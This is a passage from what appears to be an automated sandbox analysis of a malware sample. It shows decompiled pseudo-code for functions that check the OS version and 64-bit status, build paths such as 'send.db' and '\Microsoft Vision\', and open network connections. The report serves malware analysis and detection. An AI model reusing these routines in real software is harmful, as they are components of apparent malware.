                                                                      • Part of subcall function 02D13248: lstrcmpW.KERNEL32(?,?), ref: 02D13252
                                                                      • Part of subcall function 02D15EA5: VirtualFree.KERNELBASE(?,00000000,00008000,02D15C2A,00000000,?,02D210EE,?,?,02D236DB), ref: 02D15EAD
                                                                      • Part of subcall function 02D13437: lstrcpyW.KERNEL32 ref: 02D1345C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FreeLibrarylstrcpylstrlen$LoadVirtuallstrcmp
                                                                    • String ID: 4$8$Internet Explorer
                                                                    • API String ID: 708496175-747916358
                                                                    • Opcode ID: 4dad11411b094b13948d7601b256004e1ebe91a451d454d425aebb05b5584fd3
                                                                    • Instruction ID: cb6c99a13bda6138cfabf84a8468a3c6241ec9de2a276c5ca3b27178ac325fd7
                                                                    • Opcode Fuzzy Hash: 4dad11411b094b13948d7601b256004e1ebe91a451d454d425aebb05b5584fd3
                                                                    • Instruction Fuzzy Hash: F5A12771D00219ABDF15EFA5E885AEEBB7AFF54708F10406AE405A7750EB30AE45CF60
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D1FA42 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 58%
                                                                    			E02D1FA42() {
				intOrPtr _v6;
				signed int _v12;
				intOrPtr _v272;
				intOrPtr _v280;
				intOrPtr _v284;
				char _v288;
				struct HINSTANCE__* _t33;
				intOrPtr _t35;
				intOrPtr _t38;
				intOrPtr _t53;
				intOrPtr _t62;
				_Unknown_base(*)()* _t69;
				void* _t71;

				_v288 = 0x11c;
				_t33 = LoadLibraryA("ntdll.dll");
				if(_t33 == 0) {
					L3:
					_t71 = 2;
					if(_v272 != _t71) {
						goto L43;
					} else {
						_t35 = _v6;
						if(_t35 != 1) {
							if(_t35 == 2 || _t35 == 3) {
								if(_v284 != 5) {
									if(_v284 != 6) {
										if(_v284 != 0xa || _v280 != 0) {
											goto L43;
										} else {
											return (_v12 & 0x0000ffff) + 0x2710;
										}
									} else {
										_t38 = _v280;
										if(_t38 != 0) {
											if(_t38 != 1) {
												if(_t38 != _t71) {
													if(_t38 != 3) {
														goto L43;
													} else {
														return (_v12 & 0x0000ffff) + 0x189c;
													}
												} else {
													return (_v12 & 0x0000ffff) + 0x1838;
												}
											} else {
												return (_v12 & 0x0000ffff) + 0x17d4;
											}
										} else {
											return (_v12 & 0x0000ffff) + 0x1770;
										}
									}
								} else {
									if(_v280 != 1) {
										if(_v280 != _t71) {
											goto L43;
										} else {
											return (_v12 & 0x0000ffff) + 0x1450;
										}
									} else {
										return (_v12 & 0x0000ffff) + 0x13ec;
									}
								}
							} else {
								goto L43;
							}
						} else {
							if(_v284 != 5) {
								if(_v284 != 6) {
									if(_v284 != 0xa || _v280 != 0) {
										goto L43;
									} else {
										return (_v12 & 0x0000ffff) + 0x3e8;
									}
								} else {
									_t53 = _v280;
									if(_t53 != 0) {
										if(_t53 != 1) {
											if(_t53 != _t71) {
												if(_t53 != 3) {
													goto L43;
												} else {
													return (_v12 & 0x0000ffff) + 0x276;
												}
											} else {
												return (_v12 & 0x0000ffff) + 0x26c;
											}
										} else {
											return (_v12 & 0x0000ffff) + 0x262;
										}
									} else {
										return (_v12 & 0x0000ffff) + 0x258;
									}
								}
							} else {
								_t62 = _v280;
								if(_t62 != 0) {
									if(_t62 != 1) {
										if(_t62 != _t71) {
											goto L43;
										} else {
											return (_v12 & 0x0000ffff) + 0x208;
										}
									} else {
										return (_v12 & 0x0000ffff) + 0x1fe;
									}
								} else {
									return (_v12 & 0x0000ffff) + 0x1f4;
								}
							}
						}
					}
				} else {
					_t69 = GetProcAddress(_t33, "RtlGetVersion");
					if(_t69 == 0) {
						L43:
						return 0;
					} else {
						 *_t69( &_v288);
						goto L3;
					}
				}
			}
















                                                                    0x02d1fa50
                                                                    0x02d1fa5a
                                                                    0x02d1fa62
                                                                    0x02d1fa81
                                                                    0x02d1fa83
                                                                    0x02d1fa8a
                                                                    0x00000000
                                                                    0x02d1fa90
                                                                    0x02d1fa90
                                                                    0x02d1fa95
                                                                    0x02d1fb54
                                                                    0x02d1fb65
                                                                    0x02d1fb95
                                                                    0x02d1fbe2
                                                                    0x00000000
                                                                    0x02d1fbed
                                                                    0x02d1fbf7
                                                                    0x02d1fbf7
                                                                    0x02d1fb97
                                                                    0x02d1fb97
                                                                    0x02d1fb9f
                                                                    0x02d1fbaf
                                                                    0x02d1fbbe
                                                                    0x02d1fbce
                                                                    0x00000000
                                                                    0x02d1fbd0
                                                                    0x02d1fbda
                                                                    0x02d1fbda
                                                                    0x02d1fbc0
                                                                    0x02d1fbca
                                                                    0x02d1fbca
                                                                    0x02d1fbb1
                                                                    0x02d1fbbb
                                                                    0x02d1fbbb
                                                                    0x02d1fba1
                                                                    0x02d1fbab
                                                                    0x02d1fbab
                                                                    0x02d1fb9f
                                                                    0x02d1fb67
                                                                    0x02d1fb6e
                                                                    0x02d1fb81
                                                                    0x00000000
                                                                    0x02d1fb83
                                                                    0x02d1fb8d
                                                                    0x02d1fb8d
                                                                    0x02d1fb70
                                                                    0x02d1fb7a
                                                                    0x02d1fb7a
                                                                    0x02d1fb6e
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d1fa9b
                                                                    0x02d1faa2
                                                                    0x02d1fae3
                                                                    0x02d1fb34
                                                                    0x00000000
                                                                    0x02d1fb47
                                                                    0x02d1fb51
                                                                    0x02d1fb51
                                                                    0x02d1fae5
                                                                    0x02d1fae5
                                                                    0x02d1faed
                                                                    0x02d1fafd
                                                                    0x02d1fb0c
                                                                    0x02d1fb1c
                                                                    0x00000000
                                                                    0x02d1fb22
                                                                    0x02d1fb2c
                                                                    0x02d1fb2c
                                                                    0x02d1fb0e
                                                                    0x02d1fb18
                                                                    0x02d1fb18
                                                                    0x02d1faff
                                                                    0x02d1fb09
                                                                    0x02d1fb09
                                                                    0x02d1faef
                                                                    0x02d1faf9
                                                                    0x02d1faf9
                                                                    0x02d1faed
                                                                    0x02d1faa4
                                                                    0x02d1faa4
                                                                    0x02d1faac
                                                                    0x02d1fabc
                                                                    0x02d1facb
                                                                    0x00000000
                                                                    0x02d1fad1
                                                                    0x02d1fadb
                                                                    0x02d1fadb
                                                                    0x02d1fabe
                                                                    0x02d1fac8
                                                                    0x02d1fac8
                                                                    0x02d1faae
                                                                    0x02d1fab8
                                                                    0x02d1fab8
                                                                    0x02d1faac
                                                                    0x02d1faa2
                                                                    0x02d1fa95
                                                                    0x02d1fa64
                                                                    0x02d1fa6a
                                                                    0x02d1fa72
                                                                    0x02d1fbf8
                                                                    0x02d1fbfb
                                                                    0x02d1fa78
                                                                    0x02d1fa7f
                                                                    0x00000000
                                                                    0x02d1fa7f
                                                                    0x02d1fa72

                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(ntdll.dll), ref: 02D1FA5A
                                                                    • GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 02D1FA6A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AddressLibraryLoadProc
                                                                    • String ID: RtlGetVersion$ntdll.dll
                                                                    • API String ID: 2574300362-1489217083
                                                                    • Opcode ID: e20f0910a7123fcbfae48f8a427405ed3f7ff98b362518257ba180e182a4ae88
                                                                    • Instruction ID: 73672dc641c1d2134bd62f63ecd4c5ba7e6759d8a73f7d22cd5114598629711d
                                                                    • Opcode Fuzzy Hash: e20f0910a7123fcbfae48f8a427405ed3f7ff98b362518257ba180e182a4ae88
                                                                    • Instruction Fuzzy Hash: E5413831A0023CAEDF248B55E9663FCB7B4AB4174DF1448E5E645E4AC1E378CEC9CA94
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D23273 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 48stringCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 84%
                                                                    			E02D23273(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
				char _v8;
				signed int _v28;
				char _v32;
				short _v2080;
				void* _t35;
				void* _t37;

				_t35 = __edx;
				_t37 = __ecx;
				E02D11052( &_v2080, 0, 0x400);
				GetTempPathW(0x400,  &_v2080);
				lstrcatW( &_v2080, L"send.db");
				_t38 = _t37 + 4;
				E02D13437(_t37 + 4, E02D135E5( &_v8,  &_v2080));
				E02D15EA5(_v8);
				_t8 =  &_v28;
				_v28 = _v28 & 0x00000000;
				asm("xorps xmm0, xmm0");
				_v32 = 0x35;
				asm("movups [ebp-0x14], xmm0");
				E02D13679(E02D13761( &_v32, _t35, _t38),  *_t8, _a4);
				E02D13665( &_v32);
				return _a4;
			}









                                                                    0x02d23273
                                                                    0x02d2328d
                                                                    0x02d2328f
                                                                    0x02d2329f
                                                                    0x02d232b1
                                                                    0x02d232bd
                                                                    0x02d232cc
                                                                    0x02d232d4
                                                                    0x02d232dc
                                                                    0x02d232dc
                                                                    0x02d232e3
                                                                    0x02d232e6
                                                                    0x02d232ee
                                                                    0x02d232f9
                                                                    0x02d23301
                                                                    0x02d2330c

                                                                    APIs
                                                                    • GetTempPathW.KERNEL32(00000400,?), ref: 02D2329F
                                                                    • lstrcatW.KERNEL32(?,send.db), ref: 02D232B1
                                                                      • Part of subcall function 02D135E5: lstrlenW.KERNEL32(02D21E02,00000000,?,02D21E02,00000000,00000000,.bss,00000000), ref: 02D135EE
                                                                      • Part of subcall function 02D135E5: lstrlenW.KERNEL32(02D21E02,?,02D21E02,00000000,00000000,.bss,00000000), ref: 02D13605
                                                                      • Part of subcall function 02D135E5: lstrcpyW.KERNEL32 ref: 02D13620
                                                                      • Part of subcall function 02D13437: lstrcpyW.KERNEL32 ref: 02D1345C
                                                                      • Part of subcall function 02D15EA5: VirtualFree.KERNELBASE(?,00000000,00008000,02D15C2A,00000000,?,02D210EE,?,?,02D236DB), ref: 02D15EAD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrcpylstrlen$FreePathTempVirtuallstrcat
                                                                    • String ID: 5$send.db
                                                                    • API String ID: 891666058-2022884741
                                                                    • Opcode ID: ab76321da93bf50ec4c9cad4d8b86aee061194b1efcc1bd0095c46f3e774474d
                                                                    • Instruction ID: 4698abfe1b425656e7fa8fa40c6184728f6dc3fbcbe3b0e8f0e12362ce04ed1b
                                                                    • Opcode Fuzzy Hash: ab76321da93bf50ec4c9cad4d8b86aee061194b1efcc1bd0095c46f3e774474d
                                                                    • Instruction Fuzzy Hash: 1D015E71D4011CABDB10EB64EC45AEEB7BDEF50704F518065A505A2240EF749F5ACFE0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D23702 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46stringCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 66%
                                                                    			E02D23702(void* __ecx, void* __edx, intOrPtr _a4) {
				char _v8;
				char _v28;
				char _v32;
				short _v552;
				void* _t34;

				_t34 = __edx;
				_v8 = 0;
				E02D11052( &_v552, 0, 0x208);
				__imp__SHGetFolderPathW(0, 0x1c, 0, 0,  &_v552);
				lstrcatW( &_v552, L"\\Microsoft Vision\\");
				E02D1346A( &_v8, _t34, 0,  &_v552);
				_v32 = 0x3b;
				asm("xorps xmm0, xmm0");
				_v28 = 0;
				asm("movups [ebp-0x14], xmm0");
				E02D13679(E02D13761( &_v32, _t34,  &_v8), 0, _a4);
				E02D13665( &_v32);
				E02D15EA5(_v8);
				return _a4;
			}








                                                                    0x02d23702
                                                                    0x02d2371b
                                                                    0x02d2371e
                                                                    0x02d23732
                                                                    0x02d23744
                                                                    0x02d23754
                                                                    0x02d2375f
                                                                    0x02d23766
                                                                    0x02d23769
                                                                    0x02d23770
                                                                    0x02d2377b
                                                                    0x02d23783
                                                                    0x02d2378b
                                                                    0x02d23795

                                                                    APIs
                                                                    • SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 02D23732
                                                                    • lstrcatW.KERNEL32(?,\Microsoft Vision\), ref: 02D23744
                                                                      • Part of subcall function 02D15EA5: VirtualFree.KERNELBASE(?,00000000,00008000,02D15C2A,00000000,?,02D210EE,?,?,02D236DB), ref: 02D15EAD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FolderFreePathVirtuallstrcat
                                                                    • String ID: ;$\Microsoft Vision\
                                                                    • API String ID: 1529938272-253167065
                                                                    • Opcode ID: 4b46e224b2c9e08475310a363c6ee64ed77b4860a068c3a4b7217947acc35b2d
                                                                    • Instruction ID: e3bb0b2966157e33b34eaa8e8a3b8845e50965cebd3bda161e3c9db25ac9a237
                                                                    • Opcode Fuzzy Hash: 4b46e224b2c9e08475310a363c6ee64ed77b4860a068c3a4b7217947acc35b2d
                                                                    • Instruction Fuzzy Hash: D4011BB1C4011DBADB10EBA1E949DDFBBB9EF54304F104155A905A2240EB34AF58CFE0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D1F4CE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 28libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 58%
                                                                    			E02D1F4CE() {
				intOrPtr _v6;
				char _v288;
				struct HINSTANCE__* _t4;
				intOrPtr _t5;
				_Unknown_base(*)()* _t9;

				_v288 = 0x11c;
				_t4 = LoadLibraryA("ntdll.dll");
				if(_t4 == 0) {
					L3:
					_t5 = _v6;
					if(_t5 == 2 || _t5 == 3) {
						return 1;
					} else {
						goto L5;
					}
				} else {
					_t9 = GetProcAddress(_t4, "RtlGetVersion");
					if(_t9 == 0) {
						L5:
						return 0;
					} else {
						 *_t9( &_v288);
						goto L3;
					}
				}
			}








                                                                    0x02d1f4dc
                                                                    0x02d1f4e6
                                                                    0x02d1f4ee
                                                                    0x02d1f509
                                                                    0x02d1f509
                                                                    0x02d1f50e
                                                                    0x02d1f51c
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d1f4f0
                                                                    0x02d1f4f6
                                                                    0x02d1f4fe
                                                                    0x02d1f514
                                                                    0x02d1f517
                                                                    0x02d1f500
                                                                    0x02d1f507
                                                                    0x00000000
                                                                    0x02d1f507
                                                                    0x02d1f4fe

                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(ntdll.dll), ref: 02D1F4E6
                                                                    • GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 02D1F4F6
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AddressLibraryLoadProc
                                                                    • String ID: RtlGetVersion$ntdll.dll
                                                                    • API String ID: 2574300362-1489217083
                                                                    • Opcode ID: d635637fd285660c3e5f8d3d0ef454dcca3d8f6f6aa761fbe352d250c15ca45e
                                                                    • Instruction ID: 8d2758dd2652eed7400528037868f1befd4b3f333ced4afaed785f66f858fb9e
                                                                    • Opcode Fuzzy Hash: d635637fd285660c3e5f8d3d0ef454dcca3d8f6f6aa761fbe352d250c15ca45e
                                                                    • Instruction Fuzzy Hash: 40E02271A8032C29EB34AF76BC0B6D73BA84B12208F4404509542E1B44DB60CD0ACAE0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D1F51D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 58%
                                                                    			E02D1F51D() {
				intOrPtr _v272;
				intOrPtr _v284;
				char _v288;
				struct HINSTANCE__* _t5;
				_Unknown_base(*)()* _t8;

				_v288 = 0x11c;
				_t5 = LoadLibraryA("ntdll.dll");
				if(_t5 == 0) {
					L3:
					if(_v272 != 2) {
						goto L5;
					} else {
						return _v284;
					}
				} else {
					_t8 = GetProcAddress(_t5, "RtlGetVersion");
					if(_t8 == 0) {
						L5:
						return 0;
					} else {
						 *_t8( &_v288);
						goto L3;
					}
				}
			}








                                                                    0x02d1f52b
                                                                    0x02d1f535
                                                                    0x02d1f53d
                                                                    0x02d1f558
                                                                    0x02d1f55f
                                                                    0x00000000
                                                                    0x02d1f561
                                                                    0x02d1f568
                                                                    0x02d1f568
                                                                    0x02d1f53f
                                                                    0x02d1f545
                                                                    0x02d1f54d
                                                                    0x02d1f569
                                                                    0x02d1f56c
                                                                    0x02d1f54f
                                                                    0x02d1f556
                                                                    0x00000000
                                                                    0x02d1f556
                                                                    0x02d1f54d

                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(ntdll.dll), ref: 02D1F535
                                                                    • GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 02D1F545
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AddressLibraryLoadProc
                                                                    • String ID: RtlGetVersion$ntdll.dll
                                                                    • API String ID: 2574300362-1489217083
                                                                    • Opcode ID: b4722605b63cee9df40406986c3e4b04024f77cb72522ebd9f070afc721003db
                                                                    • Instruction ID: d4412d5ab6fea03802fab749c8628a4ec35b0de3aa6695ef81388ca9f33acb80
                                                                    • Opcode Fuzzy Hash: b4722605b63cee9df40406986c3e4b04024f77cb72522ebd9f070afc721003db
                                                                    • Instruction Fuzzy Hash: 14E01230A8032C9AEB34EF72FC0AAD677B85B61709F004594A606E1641DB74CD4DCED0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D20C36 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 40%
                                                                    			E02D20C36(intOrPtr* __ecx) {
				signed int _v8;
				_Unknown_base(*)()* _t6;
				intOrPtr* _t12;

				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				_t12 = __ecx;
				_t6 = GetProcAddress(GetModuleHandleA("kernel32"), "IsWow64Process");
				if(_t6 != 0) {
					 *_t6( *_t12,  &_v8);
				}
				return _v8;
			}






                                                                    0x02d20c39
                                                                    0x02d20c3a
                                                                    0x02d20c49
                                                                    0x02d20c52
                                                                    0x02d20c5a
                                                                    0x02d20c62
                                                                    0x02d20c62
                                                                    0x02d20c69

                                                                    APIs
                                                                    • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,02D1FC6D,?,?,02D12D84,?,02D24648,?,?,00000000,?), ref: 02D20C4B
                                                                    • GetProcAddress.KERNEL32(00000000), ref: 02D20C52
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AddressHandleModuleProc
                                                                    • String ID: IsWow64Process$kernel32
                                                                    • API String ID: 1646373207-3789238822
                                                                    • Opcode ID: 23199801b96bcf498eeb6dfe6c00abf26e6308cf97dec73283d62cd74aaee1b1
                                                                    • Instruction ID: c611d2c46d6b5db2efecdad306b3674ab4d662bf753eb2d42b2d5df2fb2e04ea
                                                                    • Opcode Fuzzy Hash: 23199801b96bcf498eeb6dfe6c00abf26e6308cf97dec73283d62cd74aaee1b1
                                                                    • Instruction Fuzzy Hash: BBE08676540314FBEB20DBA1DC09A8B776CEF64259B104444B411A2300D774DE0CD790
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D1D17D Relevance: 6.3, APIs: 5, Instructions: 92COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 94%
                                                                    			E02D1D17D(signed int* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				void* _t22;
				void* _t23;
				void* _t33;
				struct _CRITICAL_SECTION* _t43;
				signed int* _t59;
				intOrPtr _t62;
				void* _t66;

				_t45 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t59 = __ecx;
				_t43 = __ecx + 0x3d8;
				EnterCriticalSection(_t43);
				_t67 = _t59[0x7b];
				_t62 = _a4;
				if(_t59[0x7b] != 0) {
					L2:
					_t69 = _t59[3];
					if(_t59[3] != 0) {
						L5:
						_t63 =  &(_t59[0xf1]);
						_t22 = E02D12190( &(_t59[0xf1]), 0);
						__eflags = _t22;
						if(_t22 == 0) {
							E02D11F76(_t63);
						}
						_t23 = E02D12190( &(_t59[0xf3]), 0);
						__eflags = _t23;
						if(_t23 == 0) {
							E02D11F76( &(_t59[0xf3]));
						}
						_v12 = _t59[4];
						_v8 = _t59[0x7c];
						E02D11F4B(_t63, E02D1D0A3,  &_v12);
						E02D11F4B( &(_t59[0xf3]), E02D1D110,  &_v12);
						 *_t59 = 1;
						LeaveCriticalSection(_t43);
						E02D12190( &(_t59[0xf1]), 0xffffffff);
						E02D12190( &(_t59[0xf3]), 0xffffffff);
						EnterCriticalSection(_t43);
						 *_t59 =  *_t59 & 0x00000000;
						LeaveCriticalSection(_t43);
						E02D1D328(_t59);
						_t33 = 0;
						__eflags = 0;
					} else {
						E02D133F5(_t66, _t62);
						if(E02D157FB( &(_t59[1]), _t69, _t45,  *((intOrPtr*)(_t62 + 4))) != 0) {
							goto L5;
						} else {
							goto L4;
						}
					}
				} else {
					E02D133F5(_t66, _t62 + 8);
					if(E02D157FB( &(_t59[0x79]), _t67,  &(_t59[0x79]),  *((intOrPtr*)(_t62 + 0xc))) == 0) {
						L4:
						LeaveCriticalSection(_t43);
						_t33 = 1;
					} else {
						goto L2;
					}
				}
				return _t33;
			}












                                                                    0x02d1d17d
                                                                    0x02d1d180
                                                                    0x02d1d181
                                                                    0x02d1d185
                                                                    0x02d1d187
                                                                    0x02d1d18e
                                                                    0x02d1d194
                                                                    0x02d1d19b
                                                                    0x02d1d19e
                                                                    0x02d1d1be
                                                                    0x02d1d1be
                                                                    0x02d1d1c2
                                                                    0x02d1d1eb
                                                                    0x02d1d1eb
                                                                    0x02d1d1f5
                                                                    0x02d1d1fa
                                                                    0x02d1d1fc
                                                                    0x02d1d200
                                                                    0x02d1d200
                                                                    0x02d1d20d
                                                                    0x02d1d212
                                                                    0x02d1d214
                                                                    0x02d1d21c
                                                                    0x02d1d21c
                                                                    0x02d1d226
                                                                    0x02d1d22f
                                                                    0x02d1d23b
                                                                    0x02d1d24f
                                                                    0x02d1d25b
                                                                    0x02d1d261
                                                                    0x02d1d26b
                                                                    0x02d1d278
                                                                    0x02d1d27e
                                                                    0x02d1d284
                                                                    0x02d1d288
                                                                    0x02d1d28c
                                                                    0x02d1d291
                                                                    0x02d1d291
                                                                    0x02d1d1c4
                                                                    0x02d1d1cb
                                                                    0x02d1d1da
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d1d1da
                                                                    0x02d1d1a0
                                                                    0x02d1d1aa
                                                                    0x02d1d1bc
                                                                    0x02d1d1dc
                                                                    0x02d1d1dd
                                                                    0x02d1d1e5
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d1d1bc
                                                                    0x02d1d297

                                                                    APIs
                                                                    • EnterCriticalSection.KERNEL32(?), ref: 02D1D18E
                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,?), ref: 02D1D1DD
                                                                      • Part of subcall function 02D133F5: lstrcpyA.KERNEL32(00000000,?,?,00000000,?,02D12A97,?,?,00000000,exit,00000000,start), ref: 02D1341A
                                                                      • Part of subcall function 02D157FB: getaddrinfo.WS2_32(745D0770,00000000,02D14EA0,00000000), ref: 02D15848
                                                                      • Part of subcall function 02D157FB: socket.WS2_32(00000002,00000001,00000000), ref: 02D1585F
                                                                      • Part of subcall function 02D157FB: htons.WS2_32(00000000), ref: 02D15885
                                                                      • Part of subcall function 02D157FB: freeaddrinfo.WS2_32(00000000), ref: 02D15895
                                                                      • Part of subcall function 02D157FB: connect.WS2_32(?,?,00000010), ref: 02D158A1
                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 02D1D261
                                                                    • EnterCriticalSection.KERNEL32(?), ref: 02D1D27E
